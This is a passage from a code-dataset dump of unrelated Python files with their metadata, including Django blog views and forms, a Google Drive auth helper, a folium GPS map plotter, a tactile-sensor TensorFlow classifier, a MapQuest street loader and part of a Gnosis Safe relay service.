Div(Field('apellidos', ), css_class='col-md-3'),\n Div(Field('tipo_documento', css_class='input-required'), css_class='col-md-3'),\n Div(Field('nro_documento', css_class='input-required'), css_class='col-md-3'),\n ),\n Row(\n Div(Field('departamento', css_class='input-required'), css_class='col-md-2'),\n Div(Field('provincia', css_class='input-required'), css_class='col-md-2'),\n Div(Field('lugar', css_class='input-required'), css_class='col-md-2', ),\n\n Div(Field('direccion', css_class='input-required'), css_class='col-md-3'),\n Div(Field('nro_telefono', css_class='input-required'), css_class='col-md-3'),\n ),\n\n Row(\n FormActions(\n smtSave(\"Guardar\"),\n btnCancel(),\n ),\n ),\n )\n","sub_path":"apps/persona/forms/cliente.py","file_name":"cliente.py","file_ext":"py","file_size_in_byte":3087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"516744899","text":"from django.shortcuts import render,get_object_or_404\nfrom django.http import HttpResponse\nfrom django.views.generic import DetailView, ListView\nfrom django.db.models import Q, F\nfrom django.core.cache import cache\n\nfrom datetime import date\n\nfrom .models import Tag, Post, Category\nfrom config.models import SideBar\nfrom comment.models import Comment\nfrom comment.form import CommentForm\n# Create your views here.\n\nclass CommonViewMixin:\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context.update(\n {'sidebars': SideBar.get_all()}\n )\n context.update(Category.get_navs())\n return context\n\nclass IndexView(CommonViewMixin, ListView):\n queryset = Post.latest_posts()\n paginate_by = 5\n context_object_name = 'post_list'\n template_name = 'blog/list.html'\n\nclass PostListView(CommonViewMixin, ListView):\n queryset = Post.latest_posts()\n paginate_by = 1\n context_object_name = 'post_list'\n template_name = 'blog/list.html'\n\nclass PostDetailView(CommonViewMixin, DetailView):\n model = Post\n template_name = 'blog/detail.html'\n context_object_name = 'post'\n pk_url_kwarg = 'post_id'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context.update({\n 'comment_form': CommentForm,\n 'comment_list':Comment.get_by_target(self.request.path)\n })\n return context\n\n def get(self, request, *args, **kwargs):\n response = super().get(request, *args, **kwargs)\n self.handle_visited()\n return response\n\n def handle_visited(self):\n increase_pv = False\n increase_uv = False\n uid = self.request.uid\n pv_key = 'pv:{}:{}'.format(uid,self.request.path)\n uv_key = 'uv:{}:{}:{}'.format(uid, str(date.today()),self.request.path)\n\n if not cache.get(pv_key):\n increase_pv = True\n cache.set(pv_key, 1, 1*60)#1分钟有效\n\n if not cache.get(uv_key):\n increase_uv = True\n cache.set(pv_key, 1, 24*60*60) #24小时有效期\n\n if increase_pv and increase_uv:\n Post.objects.filter(pk=self.object.id).update(pv=F('pv')+1, uv=F('uv')+1)\n elif increase_pv:\n Post.objects.filter(pk=self.object.id).update(pv=F('pv')+1)\n elif increase_uv:\n Post.objects.filter(pk=self.object.id).update(pv=F('uv') + 1)\n\nclass CategoryView(IndexView):\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n category_id = self.kwargs.get(\"category_id\")\n category = get_object_or_404(Category, pk=category_id)\n context.update({\n 'category':category\n })\n return context\n\n def get_queryset(self):\n \"\"\"\"重写queryset, 根据分类过滤\"\"\"\n queryset = super().get_queryset()\n tag_id = self.kwargs.get('category_id')\n return queryset.filter(category__id=tag_id)\n\nclass TagView(IndexView):\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n tag_id = self.kwargs.get(\"tag_id\")\n tag = get_object_or_404(Tag, pk=tag_id)\n context.update({\n 'tag': tag,\n })\n return context\n\n def get_queryset(self):\n \"\"\"\"重写queryset, 根据标签过滤\"\"\"\n queryset = super().get_queryset()\n tag_id = self.kwargs.get('tag_id')\n return queryset.filter(tag__id=tag_id)\n\nclass SearchView(IndexView):\n def get_context_data(self):\n context = super().get_context_data()\n context.update({\n 'keyword':self.request.GET.get('keyword')\n })\n return context\n\n def get_queryset(self):\n queryset = super().get_queryset()\n keyword = self.request.GET.get('keyword')\n if not keyword:\n return queryset\n return queryset.filter(Q(title__icontains=keyword)|Q(desc__icontains=keyword))\n\nclass AuthorView(IndexView):\n def get_queryset(self):\n queryset = super().get_queryset()\n author_id = self.kwargs.get('owner_id')\n return queryset.filter(owner_id = author_id)\n","sub_path":"typeidea/blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"37140888","text":"\nimport os\nimport httplib2\n\nfrom apiclient import discovery\nfrom oauth2client import tools\nfrom oauth2client import client\nfrom oauth2client.file import Storage\n\nfrom auth import SCOPES, CLIENT_SECRET_FILE, APPLICATION_NAME\n\n\n_service = None\n\n\ndef get_service():\n global _service\n if _service:\n return _service\n http = _get_credentials().authorize(httplib2.Http(timeout=60))\n _service = discovery.build('drive', 'v3', http=http)\n return _service\n\n\ndef _get_credentials():\n home_dir = os.path.expanduser('~')\n credential_dir = os.path.join(home_dir, '.credentials')\n if not os.path.exists(credential_dir):\n os.makedirs(credential_dir)\n credential_path = os.path.join(credential_dir, APPLICATION_NAME + '-app.json')\n store = Storage(credential_path)\n credentials = store.get()\n try:\n import argparse\n flags = argparse.ArgumentParser(parents=[tools.argparser]).parse_args()\n except ImportError:\n flags = None\n if not credentials or credentials.invalid:\n flow = client.flow_from_clientsecrets(CLIENT_SECRET_FILE, SCOPES)\n flow.user_agent = APPLICATION_NAME\n credentials = tools.run_flow(flow, store, flags)\n return credentials\n","sub_path":"app/auth/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"344970351","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport pygame\nfrom color import *\n\nx = y = 0\nrunning = 1\n\nscreen = pygame.display.set_mode((600, 400))\ncont = 0\n\nwhile running:\n event = pygame.event.poll()\n if (event == pygame.QUIT):\n running = 0\n if (event == pygame.MOUSEMOTION):\n x, y = event.pos\n if (event == pygame.MOUSEBUTTONDOWN):\n if(cont<2):\n if(cont==0):\n p1 =list(event.pos)\n x1 = p1[0]\n y1 = p1[1]\n print(cont, x1, y1)\n if(cont==1):\n p2 =list(event.pos)\n x2 = p2[0]\n y2 = p2[1]\n print(cont, x2, y2)\n cont +=1\n \n screen.fill(color.negro)\n pygame.draw.line(screen, color.rojo, (x,0), (x,399))\n pygame.draw.line(screen, color.rojo, (0, y), (599,y))\n pygame.display.flip()\n \n \n","sub_path":"2020/M2/mouse.py","file_name":"mouse.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"213070058","text":"import os\nimport folium\n\n\ndef convert(loc_data):\n loc_data = loc_data.replace(\"'\", \"\")\n loc_data = loc_data[1:-2].split(',')\n\n loc_data[1] = loc_data[1].strip()\n loc_data[3] = loc_data[3].strip()\n\n lat_int = int(loc_data[1][:2])\n lat_hour = float(loc_data[1][2:])\n\n real_lat = lat_int + lat_hour / 60\n\n long_int = int(loc_data[3][:3])\n long_hour = float(loc_data[3][3:])\n\n real_long = long_int + long_hour / 60\n\n print(real_lat, real_long)\n\n return real_lat, real_long\n\n\ncurrent_dir = os.getcwd()\nfilename = \"/Database/gps2.txt\"\nfile_dir = current_dir + filename\n\nwith open(file_dir,\"r\") as f:\n data = f.readlines()\n\nstart_lat, start_long = convert(data[0])\nmap = folium.Map(location=[start_lat, start_long], zoom_start=15)\n\ncnt = 0\n\nfor single_data in data:\n print(single_data)\n mark_lat, mark_long = convert(single_data)\n\n # 숫자 조정으로 마커 간격 조정 가능\n if cnt % 30 == 0:\n folium.Marker(\n location=[mark_lat, mark_long],\n icon=folium.Icon(color='red', icon='star')\n ).add_to(map)\n\n cnt+=1\n\nmap.save('map_visualize.html')\n","sub_path":"international_2019/ThinKingo/map_visualizer.py","file_name":"map_visualizer.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"79201233","text":"from django.urls import path,include\nfrom .views import RegisterView,StudentView\n\n\n\nurlpatterns = [\n path('register/',RegisterView.as_view(),name='regiser'),\n path('student/',StudentView.as_view(),name='student'),\n path('auth/',include('rest_framework.urls')),\n]\n","sub_path":"newreg/testapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"56025864","text":"import random \nimport numpy as np\nimport cv2\nimport mss\nfrom PIL import Image\n\n##眼动轨迹数据文件\n##f=open(\"data.txt\",\"r\")\n\n##设置截图区域\nmon = {'top': 60, 'left': 60, 'width': 300, 'height': 300}\nsct =mss.mss()\nwhile 1:\n ##从文本文档中读取\n ##note=f.readline().split()\n ##实时读取\n note=[]\n a=random.randint(70,450)\n b=random.randint(70,450)\n note.append(a)\n note.append(b)\n ##对坐标进行映射\n ##.....\n\n ##截屏\n sct_img=sct.grab(mon)\n img = Image.frombytes('RGB', (sct_img.width, sct_img.height), sct_img.rgb)\n img=np.array(img)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n \n ##绘图\n cv2.circle(img,(int(note[0]),int(note[1])),10,(0,0,213))\n cv2.imshow('test', img)\n \n ##设置频率\n if cv2.waitKey(25) & 0xFF == ord('q'): \n cv2.destroyAllWindows()\n break\n\n\n\n\n##\n##图像流实现屏幕共享\n##频率一致实现轨迹标注 \n","sub_path":"test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"151368576","text":"\"\"\"\npure vector observation based learning: position of tactip and target\ntask: tactip following the cylinder to reach the ball target\nuse 382 pins\n\"\"\"\n\nimport tensorflow as tf\n# from tensorflow.keras.layers import Conv2D, MaxPooling2D, Flatten\nfrom tensorflow.python.keras.layers import Conv2D, MaxPooling2D, Flatten\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport gym, threading, queue\nfrom gym_unity.envs import UnityEnv\nimport argparse\nfrom PIL import Image\nfrom deform_visualize import plot_list_new, plot_list_new_sim2\nimport pickle\n\n\nparser = argparse.ArgumentParser(description='Train or test neural net motor controller.')\nparser.add_argument('--train', dest='train', action='store_true', default=False)\nparser.add_argument('--test', dest='test', action='store_true', default=False)\nparser.add_argument('--rotat_test', dest='rotat_test', action='store_true', default=False)\n\nargs = parser.parse_args()\n\n\nclass Classifier(object):\n def __init__(self, obs_dim, label_dim, ini_lr, num_obj=3): \n self.hidden_dim=500 \n self.num_obj=num_obj \n self.sess = tf.Session()\n self.label = tf.placeholder(tf.float32, [None, label_dim], 'label') \n self.label_obj = tf.placeholder(tf.int8, [None, num_obj], 'label_obj') \n self.obs = tf.placeholder(tf.float32, [None, obs_dim], 'obs')\n self.lr = tf.placeholder_with_default(ini_lr, shape=(), name='lr')\n self.training = tf.placeholder_with_default(False, shape=(), name='training') # BN signal\n\n l1 = tf.layers.dense(self.obs, self.hidden_dim, tf.nn.relu)\n # l1 = tf.layers.batch_normalization(l1, training=self.training, momentum=0.9)\n l2 = tf.layers.dense(l1, self.hidden_dim, tf.nn.relu)\n # l2 = tf.layers.batch_normalization(l2, training=self.training, momentum=0.9)\n l3 = tf.layers.dense(l2, self.hidden_dim, tf.nn.relu)\n # l31 = tf.layers.dense(l3, self.hidden_dim, tf.nn.relu)\n self.predict = tf.layers.dense(l3, label_dim) # predict position and rotation\n # self.predict = tf.layers.batch_normalization(self.predict, training=training, momentum=0.9)\n # l21 = tf.layers.dense(l2, self.hidden_dim, tf.nn.relu)\n logits = tf.layers.dense(l2, self.num_obj, tf.nn.relu)\n # logits = tf.layers.batch_normalization(logits, training=self.training, momentum=0.9)\n self.predict_obj = tf.nn.softmax(logits) # predict index of object\n # self.loss1 = tf.reduce_mean(tf.square(self.predict[:, :3]-self.label[:, :3])) # rotation\n self.loss1 = tf.reduce_mean(tf.square(self.predict[:, 3:]-self.label[:, 3:])) # pos\n\n # self.loss2 = tf.reduce_mean(tf.square(self.predict_obj-tf.cast(self.label_obj, tf.float32)))\n # self.loss = self.loss1 + self.loss2\n self.loss = self.loss1\n # self.optimizer = tf.train.AdamOptimizer(learning_rate=self.lr)\n self.optimizer = tf.train.GradientDescentOptimizer(learning_rate=self.lr)\n self.train_op = self.optimizer.minimize(self.loss)\n self.sess.run(tf.global_variables_initializer())\n\n def train(self, batch_s, batch_label, batch_label_obj, lr, decay):\n # self.optimizer.learning_rate = lr\n # if decay:\n # self.train_op = self.optimizer.minimize(self.loss)\n loss,_=self.sess.run([self.loss, self.train_op], {self.training: True, self.obs: batch_s, self.label: batch_label, self.label_obj: batch_label_obj, self.lr: lr})\n # if decay: \n # print(self.optimizer._lr)\n return loss\n\n def predict_one_value(self, s):\n s = s[np.newaxis, :]\n predict = self.sess.run(self.predict, {self.obs: s})\n predict_obj =self.sess.run(self.predict_obj, {self.obs: s})\n return np.concatenate((predict_obj, predict), axis=1)\n \n def predict_value(self, s):\n predict = self.sess.run(self.predict, {self.obs: s})\n predict_obj =self.sess.run(self.predict_obj, {self.obs: s})\n return np.concatenate((predict_obj, predict), axis=1)\n\n def save(self, path):\n saver = tf.train.Saver()\n saver.save(self.sess, path)\n\n def load(self, path):\n saver=tf.train.Saver()\n saver.restore(self.sess, path)\n\n\ndef plot(s):\n x=s[7::3]\n z=s[9::3]\n plot_list_new(x,z)\n\ndef state_process(s):\n ps=np.concatenate((s[7::3],s[9::3])) # ((x,x,x..),(y,y,y,...))\n return ps\n\n\ndef to_one_hot(idx_list): # return one-hot vector list for object index predicting\n num_samples = len(idx_list)\n # print(idx_list.shape)\n # print(num_samples, self.num_obj)\n one_hot = np.zeros((num_samples, num_obj))\n one_hot[np.arange(num_samples), np.array(idx_list)] = 1\n\n return one_hot\n\n\ndef Predict(input, model_path = './model/class_obj'): \n obs_dim = 182 # total 280: 0 object index, 1-3 rotation value, 4-6 average contact point position, 7-279 pins positions\n state_dim = 5 # 3 rotation, 2 position\n lr=2e-2\n num_obj=3 # number of objects\n classifier = Classifier(obs_dim, state_dim, lr, num_obj)\n classifier.load(model_path) \n predict = classifier.predict_one_value(input)\n return predict\n\nif __name__ == '__main__':\n model_path = './model/class_obj'\n training_episodes = 80000\n episode_length = 150\n obs_dim = 182 # total 280: 0 object index, 1-3 rotation value, 4-6 average contact point position, 7-279 pins positions\n state_dim = 5 # 3 rotation, 2 position\n # lr=1e-3\n lr=2e-2\n decay=0 # decay signal of lr\n num_obj=3 # number of objects\n classifier = Classifier(obs_dim, state_dim, lr, num_obj)\n\n if args.train:\n # data_file=open('data_all/fixed_data.pickle', \"rb\")\n data_file=open('data_all/random2_data_train.pickle', \"rb\")\n\n raw_data=pickle.load(data_file)\n data=[]\n label=[]\n label_obj=[]\n \n for i in range(len(raw_data)):\n s=raw_data[i]\n data_i=state_process(s)\n ''' add noise '''\n data_i=data_i+np.random.normal(0, 1e-2, data_i.shape[0]) \n data.append(data_i)\n label_pos= np.concatenate(([s[4]], [s[6]]))\n label.append(np.concatenate((s[1:4]/30., label_pos))) # normalize the rotation range by 30, to get [-1,1]\n label_obj.append(int(s[0]))\n\n label_obj=to_one_hot(label_obj)\n loss_list=[]\n # classifier.load(model_path)\n\n for eps in range(training_episodes):\n if eps%40000==0 and eps>1:\n lr *=0.5\n decay=1\n else:\n decay=0\n loss = classifier.train(data, label, label_obj, lr, decay)\n if eps==0:\n loss_list.append(loss)\n else:\n loss_list.append(0.9*loss_list[-1]+0.1*loss)\n print('Eps: {}, Loss: {}'.format(eps, loss))\n if eps % 100 ==0:\n plt.yscale('log')\n plt.plot(np.arange(len(loss_list)), loss_list)\n plt.savefig('classify_trainwithdataobj.png')\n classifier.save(model_path)\n \n np.savetxt('trainwithdata.txt', np.array(loss_list)[:, np.newaxis], fmt='%.4f', newline=', ')\n round_loss_list=list(np.around(np.array(loss_list),4))\n print(round_loss_list)\n\n\n\n\n# test with testing dataset, all at once\n if args.test:\n # test_data_file=open('data_all/data_train.pickle', \"rb\")\n # test_data_file=open('data_all/fixed_data.pickle', \"rb\")\n test_data_file=open('data_all/random2_data_train.pickle', \"rb\")\n # test_data_file=open('data_all/random2_data_test.pickle', \"rb\")\n\n raw_data=pickle.load(test_data_file)\n data=[]\n label_list=[]\n classifier.load(model_path) \n for i in range(len(raw_data)):\n s=raw_data[i]\n # print('x:', s[7::3])\n # print('y: ', s[9::3])\n data.append(state_process(s))\n label_single= np.concatenate(([raw_data[i][4]], [raw_data[i][6]]))\n label=np.concatenate((raw_data[i][1:4]/30., label_single))\n label_list.append( np.concatenate((to_one_hot([int(raw_data[i][0])])[0], label)) )\n \n predict = classifier.predict_value(data)\n loss=np.mean(np.square(np.array(label_list)-np.array(predict)))\n loss_obj=np.mean(np.square(np.array(label_list)[:, :3]-np.array(predict)[:, :3]))\n loss_rotat=np.mean(np.square(np.array(label_list)[:, 3:6]-np.array(predict)[:, 3:6]))\n loss_pos=np.mean(np.square(np.array(label_list)[:, 6:]-np.array(predict)[:, 6:]))\n print('test loss: {:.4f} {:.4f} {:.4f} {:.4f}'.format(loss_obj, loss_rotat, loss_pos, loss))\n\n norm=0.5674\n for i in range(80):\n # data_i=data[i]+np.random.normal(0, 1e-2, data[i].shape[0])\n data_i=data[i]\n xy=np.transpose(data_i.reshape(2, -1))/norm\n pos_label=[raw_data[i][4]], [raw_data[i][6]]\n plot_list_new_sim2(xy,i,predict[i][6:]/norm, np.array(pos_label)/norm)\n print(i)\n\n if args.rotat_test:\n # test_data_file=open('data_all/data_train.pickle', \"rb\")\n # test_data_file=open('data_all/data_test.pickle', \"rb\")\n test_data_file=open('data_all/fixed_data.pickle', \"rb\")\n # test_data_file=open('data_all/random2_data_test.pickle', \"rb\")\n\n raw_data=pickle.load(test_data_file)\n data=[]\n label_list=[]\n classifier.load(model_path) \n for i in range(len(raw_data)):\n s=raw_data[i]\n data.append(state_process(s))\n label_single= np.concatenate(([raw_data[i][4]], [raw_data[i][6]]))\n label=np.concatenate((raw_data[i][1:4]/30., label_single))\n label_list.append( np.concatenate((to_one_hot([int(raw_data[i][0])])[0], label)) )\n \n predict = classifier.predict_value(data)\n loss=np.mean(np.square(np.array(label_list)-np.array(predict)))\n loss_obj=np.mean(np.square(np.array(label_list)[:, :3]-np.array(predict)[:, :3]))\n loss_rotat=np.mean(np.square(np.array(label_list)[:, 3:6]-np.array(predict)[:, 3:6]))\n loss_pos=np.mean(np.square(np.array(label_list)[:, 6:]-np.array(predict)[:, 6:]))\n print('test loss: {:.4f} {:.4f} {:.4f} {:.4f}'.format(loss_obj, loss_rotat, loss_pos, loss))\n\n norm2sim=30.\n for i in range(40):\n print(predict[i][3:6], label_list[i][3:6])\n # plot_list_new_sim(xy,i,predict[i][6:]/norm2sim)\n # print(i)","sub_path":"collision_prediction/train_with_data.py","file_name":"train_with_data.py","file_ext":"py","file_size_in_byte":10490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"375680301","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\n\n# Create your views here.\ndef upload_file(request):\n if request.method == 'GET':\n return render(request,'upload_file.html')\n elif request.method == 'POST':\n rec_file = request.FILES.get('icon')\n print(rec_file)\n # with 在读取完毕后,自动关闭\n with open(\"D:/python_code/django_study/static/img/test.docx\",'wb') as save_file:\n for part in rec_file.chunks():\n save_file.write(part)\n save_file.flush()\n return HttpResponse(\"文件上传成功\")","sub_path":"django_study/upload_file/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"34523209","text":"def main():\n r,b = map(int, input().split())\n x,y = map(int, input().split())\n ok = 0\n ng = 10 ** 18 + 1\n while abs(ok - ng) > 1:\n mid = (ok + ng) // 2\n if is_ok(mid,r,b,x,y):\n ok = mid\n else:\n ng = mid\n print(ok)\n\ndef is_ok(mid, r,b,x,y):\n r -= mid\n b -= mid\n if r < 0 or b < 0:\n return False\n total = r // (x - 1)\n total += b // (y - 1)\n if total >= mid:\n return True\n else:\n return False\n\n\n\n\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"procon-archive/atcoder.jp/arc050/arc050_b/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"237456844","text":"import os\nimport environ\nimport httplib2\nfrom xml.etree import ElementTree\n\nfrom src.base.street import Street\nfrom src.base.node import Node\n\n\nclass MapquestApi(object):\n # \"http://open.mapquestapi.com/xapi/api/0.6/node[highway=crossing][bbox=8.815191135900864,47.22491209728128,8.823774204748178,47.22819078179419]?key=...\"\n\n def __init__(self, street_categories):\n self.apiKey = self._get_api_key()\n self.crosswalks = []\n self.streets = []\n self.street_categories = street_categories\n self.__LINK_PREFIX = \"http://open.mapquestapi.com/xapi/api/0.6/way[highway=*][bbox=\"\n self.__LINK_POSTFIX = \"]?key=\"\n\n def _get_api_key(self):\n cwenv = environ.Env(MAPQUEST_API_KEY=(str, 'api_key'))\n root = environ.Path(os.getcwd())\n environ.Env.read_env(root('.env'))\n return cwenv('MAPQUEST_API_KEY')\n\n def _request(self, box):\n postfix = self.to_mapquest_format(\n box) + self.__LINK_POSTFIX + self.apiKey\n url = self.__LINK_PREFIX + postfix\n response, content = httplib2.Http().request(url)\n if response.get('status') == '200' and response.get(\n 'content-type',\n '').find('text/xml') != -1:\n return ElementTree.fromstring(content)\n return None\n\n def load_data(self, bbox):\n self._load_data(bbox)\n return self.streets\n\n\n @staticmethod\n def to_mapquest_format(bbox):\n return str(bbox.left) + \",\" + str(bbox.bottom) + \",\" + str(bbox.right) + \",\" + str(bbox.top)\n\n def _load_data(self, bbox):\n tree = self._request(bbox)\n if tree is not None:\n self._parse_tree(tree)\n self._filter_crosswalks(tree)\n\n def _filter_crosswalks(self, tree):\n for node in tree.iter('node'):\n for tag in node.iter('tag'):\n if self._is_crosswalk(tag):\n self.crosswalks.append(Node(node.get('lat'), node.get('lon')))\n\n def _parse_tree(self, tree):\n node_map = self._get_node_map(tree)\n for way in tree.iter('way'):\n for tag in way.iter('tag'):\n for category in self.street_categories:\n if self._is_in_category(tag, category):\n results = self._parse_way(way, node_map)\n self.streets += results\n\n @staticmethod\n def _is_in_category(tag, category):\n return str(tag.attrib) == \"{'k': 'highway', 'v': '\" + category + \"'}\"\n\n @staticmethod\n def _is_crosswalk(tag):\n return str(tag.attrib) == \"{'k': 'highway', 'v': 'crossing'}\"\n\n def _parse_way(self, way, node_map):\n result = []\n nodes = self._create_node_list(way, node_map)\n for i in range(len(nodes) - 1):\n me = nodes[i]\n next_node = nodes[i + 1]\n\n street = self._create_street(way)\n street.nodes.append(me)\n street.nodes.append(next_node)\n result.append(street)\n\n return result\n\n @staticmethod\n def _create_street(way):\n ident = way.get('id')\n name = \"\"\n highway = \"\"\n\n for tag in way.iter('tag'):\n if tag.attrib['k'] == 'name':\n name = tag.attrib['v']\n if tag.attrib['k'] == 'highway':\n highway = tag.attrib['v']\n\n street = Street.from_info(name, ident, highway)\n return street\n\n @staticmethod\n def _create_node_list(way, node_map):\n nodes = []\n for node in way.iter('nd'):\n nid = node.get('ref')\n if nid in node_map:\n nodes.append(node_map[nid])\n return nodes\n\n @staticmethod\n def _get_node_map(tree):\n nodes = {}\n for node in tree.iter('node'):\n nodes[node.get('id')] = Node(node.get('lat'), node.get('lon'), node.get('id'))\n return nodes\n","sub_path":"src/data/mapquest_api.py","file_name":"mapquest_api.py","file_ext":"py","file_size_in_byte":3881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"424643146","text":"import numpy as np\nimport models.utils as utils\n\n\nclass ConceptActiveLearner:\n def __init__(self, n_features=3, hyp_space_type=\"boundary\",\n sampling=\"max\", true_hyp=None):\n assert(n_features > 0)\n\n self.d = [] # observed data points\n self.n_obs = 0 # number of observed data points\n self.n_labels = 2 # number of possible y values\n self.n_features = n_features\n\n if hyp_space_type == \"boundary\":\n self.hyp_space = utils.create_boundary_hyp_space(self.n_features)\n elif hyp_space_type == \"line\":\n self.hyp_space = utils.create_line_hyp_space(self.n_features)\n\n self.n_hyp = len(self.hyp_space)\n self.prior = np.array([1 / self.n_hyp\n for _ in range(self.n_hyp)])\n self.posterior = self.prior\n\n if true_hyp is not None:\n self.true_hyp = true_hyp\n self.true_hyp_idx = \\\n np.where([np.all(true_hyp == hyp)\n for hyp in self.hyp_space])[0]\n else:\n self.true_hyp_idx = np.random.randint(self.n_hyp)\n self.true_hyp = self.hyp_space[self.true_hyp_idx]\n\n self.posterior_true_hyp = np.ones(self.n_features + 1)\n self.posterior_true_hyp[0] = 1 / self.n_hyp\n self.first_feature_prob = np.zeros(n_features)\n self.sampling = sampling\n\n def likelihood(self, x, y):\n \"\"\"Calculates the likelihood of observing the datapoint x\"\"\"\n\n # assert np.logical_or(np.isclose(y, 0.0), np.isclose(y, 1.0))\n # assert y == 0.0 or y == 1.0\n\n lik = np.zeros(len(self.hyp_space))\n for i, hyp in enumerate(self.hyp_space):\n if hyp[x] == y:\n lik[i] = 1\n else:\n lik[i] = 0\n return lik\n\n def observe(self, x, y):\n \"\"\"Calculate the posterior based on observing x\"\"\"\n\n # assert np.logical_or(np.isclose(y, 0.0), np.isclose(y, 1.0))\n # assert y == 0 or y == 1\n\n lik = self.likelihood(x, y)\n posterior = np.array(self.posterior) * np.array(lik)\n if np.sum(posterior) != 0:\n return posterior / np.sum(posterior)\n else:\n return posterior\n\n def update(self, x, y):\n \"\"\"Updates the model based on observing x using Bayesian inference\"\"\"\n\n # assert np.logical_or(np.isclose(y, 0.0), np.isclose(y, 1.0))\n # assert y == 0 or y == 1\n\n # lik = self.likelihood(x, y)\n self.posterior = self.observe(x, y)\n\n def entropy(self, p):\n \"\"\"Calculate the entropy of a random variable\"\"\"\n\n # print(np.sum(p))\n # assert np.sum(p) == 1.0 # checks for valid pmf\n\n p = p[np.nonzero(p)] # remove all zero probability hypotheses\n entropy = -1 * np.sum(np.log(p) * p)\n return entropy\n\n def information_gain(self, x, y):\n \"\"\"Calulate the amount of information gain from a single observation\"\"\"\n entropy_prior = self.entropy(self.posterior)\n posterior_new = self.observe(x, y)\n entropy_post = self.entropy(posterior_new)\n information_gain = entropy_prior - entropy_post\n return information_gain\n\n def expected_information_gain(self, x):\n \"\"\"Calculate the expected information gain across all outcomes\"\"\"\n eig_vec = np.zeros(self.n_labels)\n eig_weights = np.zeros(self.n_labels)\n for i, y in enumerate(range(self.n_labels)):\n # calculate information gain\n eig_vec[i] = self.information_gain(x, y)\n\n # calculate posterior prob consistent with this observation\n eig_idx = np.where(self.hyp_space[:, x] == y)\n eig_weights[i] = np.sum(self.posterior[eig_idx])\n\n return np.dot(eig_vec, eig_weights)\n\n def run(self, n_steps=None):\n \"\"\"Runs the active learner until the true hypothesis is discovered\"\"\"\n\n # set n steps to be the number of features if not None\n if n_steps is None:\n n_steps = self.n_features\n\n queries = np.arange(self.n_features)\n\n # while np.nonzero(self.posterior)[0].shape[0] > 1:\n while np.count_nonzero(self.posterior) > 1 and n_steps > 0:\n eig = np.zeros_like(queries, dtype=np.float)\n for i, query in enumerate(queries):\n eig[i] = self.expected_information_gain(query)\n\n # save prob of selecting features\n if self.n_obs == 0:\n self.first_feature_prob = eig / np.sum(eig)\n\n query = -1\n # select query with maximum expected information gain\n if self.sampling == \"max\":\n query = queries[np.random.choice(\n np.where(eig == np.amax(eig))[0])]\n else:\n # sample proportionally\n query = np.random.choice(queries,\n p=np.abs(eig / np.sum(eig)))\n\n # update model\n query_y = self.true_hyp[query]\n self.update(query, query_y)\n\n # increment number of observations and decrease number of steps\n self.n_obs += 1\n n_steps -= 1\n\n # save current posterior of true hypothesis\n self.posterior_true_hyp[self.n_obs] = \\\n self.posterior[self.true_hyp_idx]\n\n return self.n_obs, self.posterior_true_hyp, self.first_feature_prob\n\n\nif __name__ == \"__main__\":\n hyp_space_type = \"boundary\"\n n_features = 3\n sampling = \"max\"\n\n # feature, label pairs\n xs = [0, 0, 1, 1, 2, 2]\n ys = [0, 1, 0, 1, 0, 1]\n\n x = 0\n y = 1\n\n al = ActiveLearner(n_features, hyp_space_type, sampling=sampling)\n active_learning_prob_one = np.array([\n al.expected_information_gain(x) for x in range(n_features)])\n\n # normalize\n active_learning_prob_one = active_learning_prob_one / \\\n np.sum(active_learning_prob_one)\n\n # perform update\n al.update(x=x, y=y)\n active_learning_prob_two = np.array([\n al.expected_information_gain(x) for x in range(n_features)])\n\n print(active_learning_prob_two)\n","sub_path":"models/concept_active_learner.py","file_name":"concept_active_learner.py","file_ext":"py","file_size_in_byte":6098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"179934444","text":"from typing import Tuple, Union\n\nfrom django_eth.constants import NULL_ADDRESS\nfrom gnosis.safe.safe_service import (GasPriceTooLow, InvalidRefundReceiver,\n SafeService, SafeServiceProvider)\n\nfrom safe_relay_service.gas_station.gas_station import (GasStation,\n GasStationProvider)\nfrom safe_relay_service.tokens.models import Token\n\n\nclass RelayServiceException(Exception):\n pass\n\n\nclass RefundMustBeEnabled(RelayServiceException):\n pass\n\n\nclass InvalidGasToken(RelayServiceException):\n pass\n\n\nclass SignaturesNotFound(RelayServiceException):\n pass\n\n\nclass RelayServiceProvider:\n def __new__(cls):\n if not hasattr(cls, 'instance'):\n cls.instance = RelayService(SafeServiceProvider(), GasStationProvider())\n return cls.instance\n\n @classmethod\n def del_singleton(cls):\n if 